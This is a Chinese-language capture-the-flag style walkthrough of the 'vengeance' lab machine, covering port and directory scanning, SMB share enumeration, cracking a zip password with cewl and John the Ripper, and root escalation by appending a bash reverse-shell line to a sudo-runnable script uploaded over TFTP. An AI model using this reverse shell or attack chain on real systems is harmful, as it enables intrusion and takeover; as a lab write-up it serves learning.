# 靶场搭建
直接下载导入,打开即可使用
IP: 192.168.1.136
# 渗透过程
# 信息初收集
80/udp closed http | |
123/udp closed ntp | |
139/udp closed netbios-ssn | |
161/udp closed snmp | |
445/udp closed microsoft-ds | |
2049/udp closed nfs | |
7/tcp closed echo | |
22/tcp closed ssh | |
80/tcp open http | |
88/tcp closed kerberos-sec | |
110/tcp open pop3 | |
113/tcp open ident | |
139/tcp open netbios-ssn | |
143/tcp open imap | |
161/tcp closed snmp | |
389/tcp closed ldap | |
443/tcp open https | |
445/tcp open microsoft-ds | |
993/tcp open imaps | |
995/tcp open pop3s | |
1337/tcp closed waste | |
2049/tcp closed nfs | |
6000/tcp closed X11 | |
8080/tcp closed http-proxy | |
22222/tcp open easyengine | |
54321/tcp closed unknown |
wordpress 的网站
[07:56:41] 200 - 220B - /.bash_logout
[07:56:41] 200 - 4KB - /.bashrc
[07:56:46] 200 - 807B - /.profile
[07:57:33] 301 - 0B - /index.php -> http://192.168.1.136/
[07:57:38] 200 - 19KB - /license.txt
[07:57:58] 200 - 7KB - /readme.html
[07:58:21] 301 - 178B - /wp-admin -> http://192.168.1.136/wp-admin/
[07:58:22] 301 - 178B - /wp-content -> http://192.168.1.136/wp-content/
[07:58:22] 200 - 1KB - /wp-admin/install.php
[07:58:22] 200 - 0B - /wp-content/
[07:58:22] 200 - 0B - /wp-config.php
[07:58:22] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[07:58:23] 200 - 0B - /wp-cron.php
[07:58:23] 301 - 178B - /wp-includes -> http://192.168.1.136/wp-includes/
[07:58:23] 200 - 0B - /wp-includes/rss-functions.php
Sharename Type Comment
--------- ---- -------
Anonymous Disk
print$ Disk Printer Drivers
sarapublic$ Disk Sara's Public Files
IPC$ IPC IPC Service (vengeance server (Samba, Ubuntu))
S-1-22-1-1000 Unix User\sara (Local User)
S-1-22-1-1001 Unix User\qinyi (Local User)
smbclient //192.168.1.136/sarapublic$ 发现有一些东西
eaurouge.txt N 11 Sun Mar 7 21:46:53 2021 | |
eaurouge N 110 Tue Feb 23 06:06:40 2021 | |
essay.txt N 1257 Mon Mar 8 05:28:34 2021 | |
gio.zip N 11150297 Sun Feb 21 00:48:13 2021 | |
cognac D 0 Tue Feb 23 12:48:47 2021 | |
blurb.txt N 525 Sun Mar 7 21:55:24 2021 | |
champagne D 0 Tue Feb 23 11:15:07 2021 | |
profile.txt N 337 Sun Mar 7 21:45:26 2021 |
# 破解压缩包密码
zip 有密码,根据前面的一大堆废话,推测可能要利用 profile.txt 的信息生成字典,对压缩包进行爆破
通过起一个 http 服务,将 profile.txt 挂到 web 服务器上,使用 cewl 生成字典。
通过 zip2john 生成 zip 的 hash,然后通过 john 对其进行爆破,最终得到密码 nanotechnological
通过查看 pass_reminder.txt 知道了密码的规则,结合 PPT 中获取的信息,组合出密码: giovanni_130R_Suzuka
# 提权
ssh 端口是 22222,尝试使用密码登录,发现能登录上 qinyi 这个账号
查看一下 sudo 权限
User qinyi may run the following commands on vengeance:
(root) NOPASSWD: /bin/systemctl restart nginx, /home/sara/private/eaurouge
能够重启 nginx
能够执行 sara 中的文件,那么一定和 sara 有关,查一下进程通过 sara 过滤一下子
qinyi@vengeance:~$ ps -ef | grep "sara" | |
root 972 1 0 11:53 ? 00:00:00 /usr/sbin/in.tftpd --listen --user root --address :69 --secure --create /home/sara/private |
看到有 tftp,而且就是这个文件夹,拿我们直接下载下来这个文件看看怎么事
┌──(root㉿kali)-[~] | |
└─# tftp 192.168.1.136 69 | |
tftp> get eaurouge | |
tftp> quit |
打开瞅一眼,懂了
┌──(root㉿kali)-[~] | |
└─# cat eaurouge | |
#!/bin/bash | |
touch /home/sara/public/test.txt | |
echo "Test file" > /home/sara/public/test.txt | |
chown sara:sara /home/sara/public/test.txt | |
chmod 644 /home/sara/public/test.txt |
写一个反弹 shell 进去
┌──(root㉿kali)-[~] | |
└─# echo "bash -c 'exec bash -i &>/dev/tcp/192.168.1.129/4444 <&1'" >> eaurouge |
再传上去
┌──(root㉿kali)-[~] | |
└─# tftp 192.168.1.136 69 | |
tftp> put eaurouge | |
tftp> quit |
监听 sudo 执行,直接拿到 root 的 shell!
打完收工。
# 小结
信息收集的时候思路其实挺卡的,有用的信息没有那么直观,往往需要进行二次加工。这是很恼火的点。
我还是喜欢暴力的,脑筋急转弯很不爽。
